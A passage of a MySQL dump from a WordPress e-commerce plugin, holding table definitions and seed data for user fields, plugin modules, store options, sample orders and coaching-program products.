INSERT INTO `cyb_toe_extrafields` (`id`, `code`, `parent`, `htmltype_id`, `default_value`, `params`, `label`, `description`, `destination`, `mandatory`, `ordering`, `validate`, `active`, `system`) VALUES
(1, 'first_name', 'user', 1, '', '', 'First Name', '', '["registration","shipping","billing"]', 0, 0, '', 1, 1),
(2, 'last_name', 'user', 1, '', '', 'Last Name', '', '["registration","shipping","billing"]', 0, 0, '', 1, 1),
(3, 'address', 'user', 1, '', '', 'Address', '', '["shipping","billing"]', 0, 0, '', 0, 1),
(4, 'city', 'user', 1, '', '', 'City', '', '["shipping","billing"]', 0, 0, '', 0, 1),
(5, 'zip', 'user', 1, '', '', 'Zip / Postal Code', '', '["shipping","billing"]', 0, 0, '', 0, 1),
(6, 'country', 'user', 11, '', '', 'Country', '', '["shipping","billing"]', 0, 0, '', 0, 1),
(7, 'state', 'user', 15, '', '', 'State', '', '["shipping","billing"]', 0, 0, '', 0, 1),
(8, 'phone', 'user', 1, '', '', 'Contact Phone', '', '["shipping","billing"]', 0, 0, '', 0, 1),
(9, 'fax', 'user', 1, '', '', 'Fax', '', '["shipping","billing"]', 0, 0, '', 0, 1),
(10, 'company', 'user', 1, '', '', 'Company', '', '["shipping","billing"]', 0, 0, '', 0, 1),
(11, 'username', 'user', 1, '', '', 'Username', '', '["registration"]', 0, 0, '', 1, 1),
(12, 'password', 'user', 2, '', '', 'Password', '', '["registration"]', 1, 0, '', 1, 1),
(13, 're_password', 'user', 2, '', '', 'Repeat Password', '', '["registration"]', 1, 0, '', 1, 1),
(14, 'email', 'user', 1, '', '', 'Email', '', '["registration"]', 1, 0, '', 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_htmltype`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_htmltype` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` varchar(32) NOT NULL,
  `description` varchar(255) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `label` (`label`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=18 ;

--
-- Dumping data for table `cyb_toe_htmltype`
--

INSERT INTO `cyb_toe_htmltype` (`id`, `label`, `description`) VALUES
(1, 'text', 'Text'),
(2, 'password', 'Password'),
(3, 'hidden', 'Hidden'),
(4, 'checkbox', 'Checkbox'),
(5, 'checkboxlist', 'Checkboxes'),
(6, 'datepicker', 'Date Picker'),
(7, 'submit', 'Button'),
(8, 'img', 'Image'),
(9, 'selectbox', 'Drop Down'),
(10, 'radiobuttons', 'Radio Buttons'),
(11, 'countryList', 'Countries List'),
(12, 'selectlist', 'List'),
(13, 'countryListMultiple', 'Country List with posibility to select multiple countries'),
(14, 'block', 'Will show only value as text'),
(15, 'statesList', 'States List'),
(16, 'textFieldsDynamicTable', 'Dynamic table - multiple text options set'),
(17, 'textarea', 'Textarea');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_img_status`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_img_status` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL DEFAULT '0',
  `post_id` int(11) NOT NULL DEFAULT '0',
  `status` enum('all','catt','catt_only') DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_log`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_log` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `type` varchar(64) NOT NULL,
  `data` text,
  `date_created` int(11) NOT NULL DEFAULT '0',
  `uid` int(11) NOT NULL DEFAULT '0',
  `oid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_modules`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_modules` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `code` varchar(64) NOT NULL,
  `active` tinyint(1) NOT NULL DEFAULT '0',
  `type_id` smallint(3) NOT NULL DEFAULT '0',
  `params` text,
  `has_tab` tinyint(1) NOT NULL DEFAULT '0',
  `label` varchar(128) DEFAULT NULL,
  `description` text,
  `ex_plug_dir` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `code` (`code`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=47 ;

--
-- Dumping data for table `cyb_toe_modules`
--

INSERT INTO `cyb_toe_modules` (`id`, `code`, `active`, `type_id`, `params`, `has_tab`, `label`, `description`, `ex_plug_dir`) VALUES
(1, 'adminmenu', 1, 1, '', 0, 'Admin Menu', '', NULL),
(2, 'products', 1, 1, '', 1, 'Products Mod', '', NULL),
(3, 'options', 1, 1, '', 1, 'Options', '', NULL),
(4, 'user', 1, 1, '', 1, 'Users', '', NULL),
(5, 'pages', 1, 1, '[{"page_id":170,"mod":"user","action":"getLoginForm","showFor":"guest","title":"Login"},{"page_id":171,"mod":"user","action":"getRegisterForm","showFor":"guest","title":"Registration"},{"page_id":172,"mod":"user","action":"getShoppingCart","showFor":"all","title":"Shopping Cart"},{"page_id":173,"mod":"checkout","action":"getAllHtml","showFor":"all","title":"Checkout"},{"page_id":174,"mod":"user","action":"getAccountSummaryHtml","showFor":"logged","title":"My Account"},{"page_id":175,"mod":"user","action":"getProfileHtml","showFor":"logged","title":"My Profile","parentTitle":"My Account"},{"page_id":176,"mod":"user","action":"getOrdersList","showFor":"logged","title":"My Orders","parentTitle":"My Account"},{"page_id":177,"mod":"digital_product","action":"getDownloadsList","showFor":"logged","title":"My Downloads","parentTitle":"My Account"},{"page_id":178,"mod":"user","action":"getPasswordRecoverConfirm","showFor":"guest","title":"Password Recovery Confirmation","hideFromMenu":true},{"page_id":179,"mod":"products","action":"getCategoriesListHtml","showFor":"all","title":"Categories"},{"page_id":180,"mod":"products","action":"getBrandsListHtml","showFor":"all","title":"Brands"},{"page_id":181,"mod":"products","action":"getAllProductsListHtml","showFor":"all","title":"All Products"}]', 1, 'Pages', '', NULL),
(6, 'checkout', 1, 1, '', 1, 'Checkout', '', NULL),
(7, 'payondelivery', 0, 2, '', 0, 'Pay On Delivery', '', NULL),
(8, 'flatrate', 1, 3, '[{"rate":5}]', 0, 'Flat Rate', '', NULL),
(9, 'order', 1, 1, '', 0, 'Order', '', NULL),
(10, 'currency', 1, 1, '', 1, 'Currency', '', NULL),
(11, 'paypal', 1, 2, '[{"email":"blesko@leskowebengineering.com","paymentaction":"sale","testMode":"1","success_order_status":"paid"}]', 0, 'PayPal', '', NULL),
(12, 'taxes', 1, 1, '', 1, 'Taxes', '', NULL),
(13, 'cartwidget', 1, 4, '', 0, 'Shopping Cart widget', '', NULL),
(14, 'bcwidget', 1, 4, '', 0, 'Brands & Categories widget', '', NULL),
(15, 'templates', 1, 1, '', 1, 'Templates for Plugin', '', NULL),
(16, 'digital_product', 1, 5, '', 0, 'Digital Product', 'Provides ability to sell files', NULL),
(17, 'messenger', 1, 1, '', 1, 'Notifications', 'Module provides the ability to create templates for user notifications and for mass mailing.', NULL),
(18, 'tablerate', 1, 3, '', 0, 'Table Rate Shipping', '', NULL),
(19, 'featured_products', 1, 4, '', 0, 'Featured Products Block Widget', 'Widget to display Featured Products', NULL),
(20, 'single_product', 1, 4, '', 0, 'Single Product Block Widget', 'Widget to display Single Product', NULL),
(21, 'deposit_account', 0, 2, '', 0, 'Deposit Account', 'Deposit Account Payment Module', NULL),
(22, 'breadcrumbs', 1, 4, '', 0, 'Breadcrumbs Widget', 'Widget to display Breadcrumbs', NULL),
(23, 'pagination', 1, 1, '', 0, 'Pagination', 'Pagination module', NULL),
(24, 'currencywidget', 1, 4, '', 0, 'Currency Widget', 'Currency Widget module', NULL),
(25, 'bestsellers_widget', 1, 4, '', 0, 'Bestsellers Widget', 'Bestsellers Widget module', NULL),
(26, 'recent_products_widget', 1, 4, '', 0, 'Recent Products Widget', 'Recent Products Widget module', NULL),
(27, 'search_widget', 1, 4, '', 0, 'Search Widget', 'Search Widget module', NULL),
(28, 'shipping', 1, 1, '', 1, 'Shipping', 'Provides shipping modules control', NULL),
(29, 'slider_widget', 1, 4, '', 0, 'Slider Widget', 'Slider Widget', NULL),
(30, 'shortcodes', 1, 6, '', 0, 'Shortcodes', 'Shortcodes data (accept products and categories shortcodes for now)', NULL),
(31, 'img', 1, 1, '', 0, 'Images', 'Images pre-processing', NULL),
(32, 'twitter_widget', 1, 4, '', 0, 'Twitter Widget', 'Twitter Widget', NULL),
(33, 'mostviewed_widget', 1, 4, '', 0, 'Most Viewed Products', 'Most Viewed Products module', NULL),
(34, 'related_widget', 1, 4, '', 0, 'Related Products Widget', 'Related Products Widget', NULL),
(35, 'categorybrands_products', 1, 4, '', 0, 'Category/Brands Products', 'Category/Brands Products module', NULL),
(36, 'alsopurchased_widget', 1, 4, '', 0, 'Also purchased products', 'Show Also purchased products widget', NULL),
(37, 'weight', 1, 1, '', 0, 'Weight', 'Internal system module to work with weight', NULL),
(38, 'size', 1, 1, '', 0, 'Size', 'Internal system module to work with sizes', NULL),
(39, 'log', 1, 1, '', 0, 'Log', 'Internal system module to log some actions on server', NULL),
(40, 'comments_widget', 1, 4, '', 0, 'Products Comments Widget', 'Products Comments Widget', NULL),
(41, 'countries', 1, 1, '', 1, 'Countries', 'Countries for your store', NULL),
(42, 'states', 1, 1, '', 1, 'States', 'States for your store', NULL),
(43, 'promo_ready', 1, 1, '', 0, 'Promo Ready', 'Promo Ready', NULL),
(44, 'dummy_data', 1, 1, '', 0, 'Dummy Data', 'Dummy Data', NULL),
(45, 'products_fields', 1, 1, '', 1, 'Products fields', 'Products fields', NULL),
(46, 'usaepay', 1, 2, '', 1, 'USAepay Payments', 'USAepay Payment Module', 'Ready-USAepay');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_modules_type`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_modules_type` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` varchar(64) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=7 ;

--
-- Dumping data for table `cyb_toe_modules_type`
--

INSERT INTO `cyb_toe_modules_type` (`id`, `label`) VALUES
(1, 'system'),
(2, 'payment'),
(3, 'shipping'),
(4, 'widget'),
(5, 'product_extra'),
(6, 'addons');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_options`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_options` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `code` varchar(64) CHARACTER SET latin1 NOT NULL,
  `value` text,
  `label` varchar(128) CHARACTER SET latin1 DEFAULT NULL,
  `description` text CHARACTER SET latin1,
  `htmltype_id` smallint(2) NOT NULL DEFAULT '1',
  `params` text,
  `cat_id` mediumint(3) DEFAULT '0',
  `sort_order` mediumint(3) DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `code` (`code`),
  KEY `id` (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=57 ;

--
-- Dumping data for table `cyb_toe_options`
--

INSERT INTO `cyb_toe_options` (`id`, `code`, `value`, `label`, `description`, `htmltype_id`, `params`, `cat_id`, `sort_order`) VALUES
(1, 'store_name', 'The One Ecomerce', 'Store Name', 'Name of Your Store', 1, NULL, 1, 0),
(2, 'store_email', '', 'Store Email', 'Email to notify about Orders or Other actions', 1, NULL, 1, 0),
(3, 'notify_on_reg', '0', 'Notify on user registration', 'Notify on user registration', 4, NULL, 1, 0),
(4, 'use_store_email_as_from', '0', 'Include Store Email in Mails', 'Use Store Email as From address in emails, sent from store', 4, NULL, 2, 0),
(5, 'shipping_mandatory', '0', 'Shipping is Mandatory on checkout', 'If true - customer will not be able to continue checkout without selecting shipping module ', 4, NULL, 2, 0),
(6, 'payment_mandatory', '0', 'Payment is Mandatory on checkout', 'If true - customer will not be able to continue checkout without selecting payment module', 4, NULL, 2, 0),
(7, 'stock_check', '0', 'Check products stock', '', 4, NULL, 2, 0),
(8, 'stock_allow_checkout', '1', 'Allow buy product if it is out-of-stock', '', 4, NULL, 2, 0),
(9, 'stock_substract', '0', 'Substract quantity from product after checkout', 'If this option is enabled - after checkout quantity of product in database will be reduced the number of product were buyed', 4, NULL, 2, 0),
(10, 'allow_guest_checkout', '1', 'Allow unregistered users to checkout', 'If not checked - registration will be mandatory before checkout', 4, NULL, 2, 0),
(11, 'autofill_sku', '0', 'Generate SKU automatically', 'If checked - SKU will be generated automatically on product add page.', 4, NULL, 4, 0),
(12, 'version', '0.3.5.2', 'Plugin version', 'Plugin version', 3, NULL, 1, 0),
(13, 'default_theme', 'standard', 'Plugin Theme', 'Plugin default Theme. To change it go to Template tab', 3, NULL, 1, 0),
(14, 'product_preview_width', '220', 'Product Category Preview Width', 'DO NOT CHANGE THIS PARAMETER IF YOU HAVE ALREADY UPLOADED IMAGES TO PRODUCTS. ALL OLD IMAGES WILL NOT BE RESIZED. OR YOU CAN REUPLOAD OLD IMAGES. ', 1, NULL, 3, 0),
(15, 'product_preview_height', '220', 'Product Category Preview Height', 'DO NOT CHANGE THIS PARAMETER IF YOU HAVE ALREADY UPLOADED IMAGES TO PRODUCTS. ALL OLD IMAGES WILL NOT BE RESIZED. OR YOU CAN REUPLOAD OLD IMAGES. ', 1, NULL, 3, 0),
(16, 'product_preview_crop', '1', 'Product Category Preview Crop', 'DO NOT CHANGE THIS PARAMETER IF YOU HAVE ALREADY UPLOADED IMAGES TO PRODUCTS. ALL OLD IMAGES WILL NOT BE RESIZED. OR YOU CAN REUPLOAD OLD IMAGES. ', 4, NULL, 3, 0),
(17, 'product_display_width', '400', 'Product Big Image Width', 'DO NOT CHANGE THIS PARAMETER IF YOU HAVE ALREADY UPLOADED IMAGES TO PRODUCTS. ALL OLD IMAGES WILL NOT BE RESIZED. OR YOU CAN REUPLOAD OLD IMAGES. The width of the product big image at product overview page. Note that on click the full size image will appear.', 1, NULL, 3, 0),
(18, 'product_display_height', '400', 'Product Big Image Height', 'DO NOT CHANGE THIS PARAMETER IF YOU HAVE ALREADY UPLOADED IMAGES TO PRODUCTS. ALL OLD IMAGES WILL NOT BE RESIZED. OR YOU CAN REUPLOAD OLD IMAGES. The width of the product big image at product overview page. Note that on click the full size image will appear.', 1, NULL, 3, 0),
(19, 'product_display_crop', '1', 'Product Big Image Crop', 'DO NOT CHANGE THIS PARAMETER IF YOU HAVE ALREADY UPLOADED IMAGES TO PRODUCTS. ALL OLD IMAGES WILL NOT BE RESIZED. OR YOU CAN REUPLOAD OLD IMAGES. The width of the product big image at product overview page. Note that on click the full size image will appear.', 4, NULL, 3, 0),
(20, 'product_small_width', '170', 'Product Preview Image Width', 'DO NOT CHANGE THIS PARAMETER IF YOU HAVE ALREADY UPLOADED IMAGES TO PRODUCTS. ALL OLD IMAGES WILL NOT BE RESIZED. OR YOU CAN REUPLOAD OLD IMAGES. The width of the product small images at product overview page.', 1, NULL, 3, 0),
(21, 'product_small_height', '200', 'Product Preview Image Height', 'DO NOT CHANGE THIS PARAMETER IF YOU HAVE ALREADY UPLOADED IMAGES TO PRODUCTS. ALL OLD IMAGES WILL NOT BE RESIZED. OR YOU CAN REUPLOAD OLD IMAGES. The width of the product small images at product overview page.', 1, NULL, 3, 0),
(22, 'product_small_crop', '1', 'Product Preview Image Crop', 'DO NOT CHANGE THIS PARAMETER IF YOU HAVE ALREADY UPLOADED IMAGES TO PRODUCTS. ALL OLD IMAGES WILL NOT BE RESIZED. OR YOU CAN REUPLOAD OLD IMAGES. The width of the product small images at product overview page.', 4, NULL, 3, 0),
(23, 'product_single_width', '170', 'Single Product Image Width', 'DO NOT CHANGE THIS PARAMETER IF YOU HAVE ALREADY UPLOADED IMAGES TO PRODUCTS. ALL OLD IMAGES WILL NOT BE RESIZED. OR YOU CAN REUPLOAD OLD IMAGES. The width of the product image at single product widget.', 1, NULL, 3, 0),
(24, 'login_after_register', '0', 'Login New customers after registration', 'This will make new customer logged in right after registration', 4, NULL, 1, 0),
(25, 'checkout_steps', '{"sortOrder":["loginForm","registrationForm","billingAddress","shippingAddress","paymentModules","terms","shippingModules","summaryBlock","totalBlock","comments"],"displayName":["Login Form","Registration Form","Billing Address","Shipping Address","Payment","Terms and Conditions","Shipping","Cart Summary","Totals","Comments"],"disable":{"loginForm":"1","registrationForm":"1","billingAddress":"1","shippingAddress":"1","paymentModules":"1","terms":"1","shippingModules":"1","comments":"1"}}', 'Checkot steps', 'Checkout steps data, see Checkout tab', 3, NULL, 2, 0),
(26, 'cart_columns', '{"sortOrder":["id","img","name","qty","price","total","action"],"disable":{"id":"1","img":"1","qty":"1"}}', 'Cart Product Columns', 'See Checkout tab', 3, NULL, 2, 0),
(27, 'checkout_success_text', '', 'Checkout Success Step Text', 'See Checkout tab', 3, NULL, 2, 0),
(28, 'checkout_skip_confirm_step', '1', 'Skip confirmation step on checkout', 'If this option is selected, customer will be redirected to checkout success step or to billing site right after first checkout step', 4, NULL, 2, 0),
(29, 'show_subscreen_on_center', '1', 'Sub Screen pop-up on center', 'Always show Sub Screen pop-up on center of the page', 4, NULL, 1, 0),
(30, 'enable_img_cache', '1', 'Enable cache for images', 'Allow to cache images data', 4, NULL, 3, 0),
(31, 'checkout_force_create_user', '0', 'Create user on checkout in any case', 'This will create user on each checkout in ANY case - even if some data, that need for WP is missed - it will be stored with made-up data', 4, NULL, 2, 0),
(32, 'weight_units', 'lb', 'Weight Units', 'Units of weight for your products', 9, 'a:1:{s:7:"options";a:4:{s:2:"lb";s:6:"Pounds";s:2:"kg";s:8:"Kilogram";s:2:"oz";s:5:"Ounce";s:1:"g";s:4:"Gram";}}', 4, 0),
(33, 'size_units', 'inch', 'Size Units', 'Units of size dimensions of your products', 9, 'a:1:{s:7:"options";a:4:{s:4:"inch";s:6:"Inches";s:1:"m";s:5:"Metre";s:2:"cm";s:10:"Centimetre";s:2:"mm";s:10:"Millimetre";}}', 4, 0),
(34, 'store_company', '', 'Your company name', 'Company name of your store owner.', 1, NULL, 5, 0),
(35, 'store_phone', '', 'Your phone number', 'Phone number of your store or your manager.', 1, NULL, 5, 0),
(36, 'store_address', '', 'Your address', 'Address of your store (or warehouse) location, used when calculating shipping charges of some shipping methods.', 1, NULL, 5, 0),
(37, 'store_city', '', 'Your city', 'City of your store (or warehouse) location, used when calculating shipping charges of some shipping methods.', 1, NULL, 5, 0),
(38, 'store_country', '', 'Store Country', 'Select Country were Your store is situated', 11, NULL, 5, 0),
(39, 'store_state', '', 'Your state', 'State of your store (or warehouse) location, used when calculating shipping charges of some shipping methods.', 15, NULL, 5, 0),
(40, 'store_zip', '', 'Your postal/zip code', 'Postal/zip code of your store (or warehouse) location, used when calculating shipping charges of some shipping methods.', 1, NULL, 5, 0),
(41, 'terms', '{"termsURL":"","termsText":""}', 'Terms and conditions', 'Terms and conditions', 3, NULL, 2, 0),
(42, 'enable_log_actions', '1', 'Enable log actions', 'Enable log actions. This feature can not support all actions. Be aware that this can load your database.', 4, NULL, 1, 0),
(43, 'img_preprocessing_type', 'timthumb', 'Images preprocessing type', 'None - will show primary uploaded image, Timthumb is more faster, but Built-in Plug method allow image manipulation by addons for images (such as watermarks)', 9, 'a:1:{s:7:"options";a:3:{s:0:"";s:4:"None";s:8:"timthumb";s:8:"Timthumb";s:6:"plugin";s:13:"Built-in Plug";}}', 3, 0),
(44, 'prod_show_from_label_if_opt_exist', '0', 'Show "From" label near product price', 'Will add mark "From" near products price in listing if product have at least on additional field which affect on product price', 4, NULL, 4, 0),
(45, 'dialog_after_prod_add', '1', 'Show dialog after product was added', 'Show dialog box after product was added (via ajax) or not', 4, NULL, 4, 0),
(46, 'shipp_same_as_bill', '1', 'By default, Shipping address is same as Billing', 'On checkout shipping address will be same as billing by default (corresponding checkbox will be checked by default).', 4, NULL, 2, 0),
(47, 'buy_now_redirect', 'shopping_cart', 'Redirect for "Buy Now"', 'Redirect to page after user click on "Buy Now" button', 9, 'a:1:{s:7:"options";a:2:{s:8:"checkout";s:13:"Checkout Page";s:13:"shopping_cart";s:18:"Shopping Cart Page";}}', 2, 0),
(48, 'ssl_on_checkout', '', 'Use SSL on checkout', 'If you have already setup correct SSL for your site and want always open checkout with SSL protocol - enable this option', 4, NULL, 2, 0),
(49, 'ssl_on_account', '', 'Use SSL on user account', 'If you have already setup correct SSL for your site and want always open registration, login and user account pages with SSL protocol - enable this option', 4, NULL, 2, 0),
(50, 'use_only_one_country', '', 'Use only one country for users', 'If your store will use only one country - select it here. In this case all country select lists for shipping or billing user fields will be hidden and countryy will be set to selected automaticaly.', 11, NULL, 2, 0),
(51, 'show_subcategories_on_categories_page', '', 'Show sub categories on categories page', 'We install by default page with all categories. If this option is enables - on that page you will see sub-categories too.', 4, NULL, 4, 0),
(52, 'ignore_payments_on_zero_total', '1', 'Ignore payments if order total amount is 0', 'Ignore payments if order total amount is 0 even if payment module selection is mandatory', 4, NULL, 2, 0),
(53, 'show_subcategories_if_exist', '', 'Show sub-categories if possible', 'If category have sub-categories - they will be displayed when user go to category. In normal way there are always products list displayed.', 4, NULL, 4, 0),
(54, 'hide_unavailable_shipping', '1', 'Hide unavailable shipping methods', 'If this is checked - then on checkout after user select country/state if some shipping module is unavailable - they will be hidden.', 4, NULL, 2, 0),
(55, 'show_qty_coming_soon', '0', 'Show Coming Soon message instead of Buy Now if QTY for product is 0 ', 'If checked - there will be no Buy now or Add to cart buttons for products, that have 0 QTY in stock.', 4, NULL, 4, 0),
(56, 'use_new_products_fields', '1', 'Use new products fields functionality', 'It is better to use our new products fields functionality, but if like old functionality and alredy have your store with old product fields - you can continue use old product fields.', 4, NULL, 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_options_categories`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_options_categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` varchar(128) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `id` (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=7 ;

--
-- Dumping data for table `cyb_toe_options_categories`
--

INSERT INTO `cyb_toe_options_categories` (`id`, `label`) VALUES
(1, 'General'),
(2, 'Checkout'),
(3, 'Images'),
(4, 'Products'),
(5, 'Store Address'),
(6, 'Other');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_orders`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_orders` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `shipping_address` text NOT NULL,
  `billing_address` text NOT NULL,
  `shipping_module` text NOT NULL,
  `payment_module` text NOT NULL,
  `taxes` text,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `status` enum('created','pending','paid','confirmed','delivered','cancelled') NOT NULL DEFAULT 'created',
  `sub_total` float(10,2) NOT NULL DEFAULT '0.00',
  `tax_rate` float(10,2) NOT NULL DEFAULT '0.00',
  `total` float(10,2) NOT NULL DEFAULT '0.00',
  `currency` text NOT NULL,
  `comments` text,
  `date_created` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=4 ;

--
-- Dumping data for table `cyb_toe_orders`
--

INSERT INTO `cyb_toe_orders` (`id`, `shipping_address`, `billing_address`, `shipping_module`, `payment_module`, `taxes`, `user_id`, `status`, `sub_total`, `tax_rate`, `total`, `currency`, `comments`, `date_created`) VALUES
(1, '{"first_name":null,"last_name":null}', '{"first_name":null,"last_name":null}', '', 'paypal', '[]', 1, 'created', 147.00, 0.00, 147.00, '{"id":"1","code":"USD","label":"US Dollar","value":"1","symbol":"$","symbol_left":"$ ","symbol_right":"","symbol_point":",","symbol_thousand":" ","decimal_places":"2","use_as_default":"1","currency_view":"$ 1","price_view":"100 000,00"}', '', 1399695420),
(2, '{"first_name":null,"last_name":null}', '{"first_name":null,"last_name":null}', '', 'paypal', '[]', 1, 'created', 0.00, 0.00, 0.00, '{"id":"1","code":"USD","label":"US Dollar","value":"1","symbol":"$","symbol_left":"$ ","symbol_right":"","symbol_point":",","symbol_thousand":" ","decimal_places":"2","use_as_default":"1","currency_view":"$ 1","price_view":"100 000,00"}', '', 1400165407),
(3, '{"first_name":null,"last_name":null}', '{"first_name":null,"last_name":null}', '', 'usaepay', '[]', 1, 'created', 0.00, 0.00, 0.00, '{"id":"1","code":"USD","label":"US Dollar","value":"1","symbol":"$","symbol_left":"$ ","symbol_right":"","symbol_point":"","symbol_thousand":" ","decimal_places":"0","use_as_default":"1","currency_view":"$ 1","price_view":"100 000"}', '', 1400197552);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_orders_items`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_orders_items` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `order_id` int(11) NOT NULL,
  `product_id` int(11) NOT NULL,
  `product_name` varchar(255) NOT NULL,
  `product_sku` varchar(64) NOT NULL,
  `product_price` decimal(10,2) NOT NULL DEFAULT '0.00',
  `product_qty` int(11) NOT NULL DEFAULT '0',
  `product_params` text,
  PRIMARY KEY (`id`),
  KEY `order_id` (`order_id`),
  KEY `product_id` (`product_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=8 ;

--
-- Dumping data for table `cyb_toe_orders_items`
--

INSERT INTO `cyb_toe_orders_items` (`id`, `order_id`, `product_id`, `product_name`, `product_sku`, `product_price`, `product_qty`, `product_params`) VALUES
(4, 2, 98, 'Buy program + 3.5 hours of coaching (PCP 2)', '98', '397.00', 1, '{"options":[]}'),
(5, 1, 96, 'Buy the program &nbsp;&nbsp;alone', '96', '147.00', 1, '{"options":[]}'),
(6, 2, 100, 'Free 20 min consultation (FC) + Benefits eBook', '100', '0.00', 1, '{"options":[]}'),
(7, 3, 154, 'Buy customized coaching only', '101', '0.00', 1, '{"options":[]}');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_products`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_products` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `post_id` int(11) NOT NULL DEFAULT '0',
  `cost` decimal(10,2) NOT NULL DEFAULT '0.00',
  `price` decimal(10,2) NOT NULL DEFAULT '0.00',
  `weight` float(7,3) DEFAULT '0.000',
  `sku` varchar(64) NOT NULL,
  `quantity` int(11) unsigned NOT NULL DEFAULT '0',
  `featured` tinyint(1) NOT NULL DEFAULT '0',
  `mark_as_new` tinyint(1) NOT NULL DEFAULT '0',
  `views` int(11) NOT NULL DEFAULT '0',
  `width` decimal(10,6) NOT NULL DEFAULT '0.000000',
  `height` decimal(10,6) NOT NULL DEFAULT '0.000000',
  `length` decimal(10,6) NOT NULL DEFAULT '0.000000',
  `sort_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=8 ;

--
-- Dumping data for table `cyb_toe_products`
--

INSERT INTO `cyb_toe_products` (`id`, `post_id`, `cost`, `price`, `weight`, `sku`, `quantity`, `featured`, `mark_as_new`, `views`, `width`, `height`, `length`, `sort_order`) VALUES
(1, 98, '0.00', '397.00', 0.000, '98', 0, 0, 0, 1190, '0.000000', '0.000000', '0.000000', 2),
(2, 154, '0.00', '0.00', 0.000, '101', 0, 0, 0, 0, '0.000000', '0.000000', '0.000000', 4),
(3, 101, '0.00', '0.00', 0.000, '', 0, 0, 0, 0, '0.000000', '0.000000', '0.000000', 0),
(4, 96, '0.00', '147.00', 0.000, 'CYB-1', 0, 0, 0, 1297, '0.000000', '0.000000', '0.000000', 1),
(5, 99, '0.00', '657.00', 0.000, '99', 0, 0, 0, 1203, '0.000000', '0.000000', '0.000000', 3),
(6, 100, '0.00', '0.00', 0.000, '100', 0, 0, 0, 1163, '0.000000', '0.000000', '0.000000', 5),
(7, 2343, '0.00', '1225.00', 0.000, '7Coaching', 0, 1, 0, 1260, '0.000000', '0.000000', '0.000000', 4);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_products_fields`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_products_fields` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` varchar(255) NOT NULL,
  `htmltype_id` smallint(2) NOT NULL,
  `default_value` text,
  `mandatory` tinyint(1) NOT NULL DEFAULT '0',
  `active` tinyint(1) NOT NULL DEFAULT '0',
  `sort_order` int(11) NOT NULL DEFAULT '0',
  `original_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;

--
-- Dumping data for table `cyb_toe_products_fields`
--

INSERT INTO `cyb_toe_products_fields` (`id`, `label`, `htmltype_id`, `default_value`, `mandatory`, `active`, `sort_order`, `original_id`) VALUES
(1, 'ISURL', 1, 'https://beliefcloset.infusionsoft.com/app/manageCart/addProduct?productId=33', 0, 1, 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_products_fields_options`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_products_fields_options` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `products_field_id` int(11) NOT NULL DEFAULT '0',
  `label` varchar(255) NOT NULL,
  `price` decimal(10,2) NOT NULL DEFAULT '0.00',
  `absolute` tinyint(1) NOT NULL DEFAULT '0',
  `sort_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `products_field_id` (`products_field_id`)
